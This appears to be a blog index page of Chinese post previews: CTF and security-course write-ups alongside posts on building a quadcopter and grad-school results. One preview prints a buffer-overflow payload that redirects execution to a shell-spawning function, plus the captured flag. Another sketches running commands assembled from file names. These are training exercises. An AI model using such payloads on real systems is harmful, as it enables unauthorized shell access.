我來打醬油的
好像都沒貢獻到啥QQ

來記錄一下Web簡單題的解法
和幾題賽中有碰，但沒解出來的QQ

Baby First Revenge v1

這題和隊友討論很久才搞定QQ
其實一開始我們的方向就是正確的
比賽剛開始就在想，利用>ls之類的寫檔
再用ls>z，把產生的那些檔名塞到另一個檔案
最後串成指令去sh z跑

但後來發現ls會有順序問題，難搞定
思路就愈走愈偏了QQ

前言

這堂課是台大、台科大、交大、中央(?聯合的資安課程
今年全上pwn跟reverse，跟前年不太一樣(前年還有教Web、Crypto…等)
這一篇文章主要放這門課作業和練習的Write up，記錄一下解法怕忘記

課程網站：https://csie.ctf.tw

[hw0] Pwn 1

0x400566有個callme()
裡頭就是system("/bin/sh")
overflow蓋return address跳過去即可get shell
padding長度40

1

perl -e 'print "A"x40, "\x66\x05\x40\x00\x00\x00\x00\x00"'

1

FLAG{BuFFer_0V3Rflow_is_too_easy}

前言

AIS3 workshop是AIS3上課的pwn跟SSRF練習平台。
因為平台好像關惹，我也懶得重搞環境打一次
所以下面解法很多都是憑著印象打出來的，有錯請見諒

lab1

前言

從以前就一直對四軸相當感興趣
覺得身為理工人應該要玩個四軸才對，而且不應該買套裝成品，應該要自己組XD
然後最近因為研究歐拉角、姿態等問題，讓我有了想自己買零件組裝的衝動。
可是稍微做一下功課發現，如果要組一台F450機架大小的四軸(含遙控器)，大概也至少要5000、6000以上。
於是我就忍痛賣掉一部分考研的書，賺了一些錢去某個沒屋頂賣場買了一組6500的套餐
但因為RX-701沒貨了，我就改買RX-601，老闆還因此只算我5000多而已，撿了一點便宜。

開箱和組裝

以下的開箱和組裝過程，不會詳細講每一步驟
如果想更清楚了解組裝過程，可以參考我最下面的參考資料

成績

(開學Update: 最後除了台大資工外全都備上惹)

前言